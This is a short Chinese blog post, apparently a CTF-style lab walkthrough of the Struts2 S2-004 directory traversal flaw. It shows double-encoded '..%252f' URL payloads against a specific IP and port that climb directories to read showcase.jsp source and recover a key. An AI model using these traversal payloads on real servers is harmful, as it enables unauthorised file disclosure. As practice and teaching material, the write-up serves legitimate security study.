【Struts2-命令-目录遍历漏洞】S2-004

郭大路路 2020-04-16

s2-004为目录遍历漏洞,可以通过../转到上级目录

将/二次编码为%252f

访问url:http://219.153.49.228:45437/struts/..%252f

 
【Struts2-命令-目录遍历漏洞】S2-004
 

不断向上级跳转,直到发现showcase.jsp

 
【Struts2-命令-目录遍历漏洞】S2-004
 

查看源码获得key

http://219.153.49.228:45437/struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp

 
【Struts2-命令-目录遍历漏洞】S2-004

相关推荐

sunh / 0评论 2013-06-19